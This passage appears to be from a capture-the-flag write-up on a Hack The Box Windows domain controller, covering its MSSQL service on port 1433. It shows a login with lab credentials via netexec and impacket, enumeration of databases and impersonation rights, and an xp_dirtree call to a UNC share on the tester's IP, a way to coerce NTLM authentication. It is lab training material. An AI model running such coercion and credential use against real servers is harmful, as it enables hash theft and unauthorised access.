search

1433

❯ netexec mssql 10.129.232.128 -u 'rose' -p 'KxEPkKe6R8su'
MSSQL       10.129.232.128  1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL       10.129.232.128  1433   DC01             [+] sequel.htb\rose:KxEPkKe6R8su

❯ impacket-mssqlclient -p 1433 sequel.htb/rose:[email protected] -windows-auth
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SEQUEL\rose  guest@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee   grantor
----------   --------   ---------------   ----------   -------   -------
SQL (SEQUEL\rose  guest@master)> SELECT name FROM sys.databases;
name
------
master
tempdb
model
msdb
SQL (SEQUEL\rose  guest@master)> xp_dirtree \\10.10.14.121\adot8\
subdirectory   depth   file
------------   -----   ----
SQL (SEQUEL\rose  guest@master)>

Nothing

Previous445NextFoothold

Last updated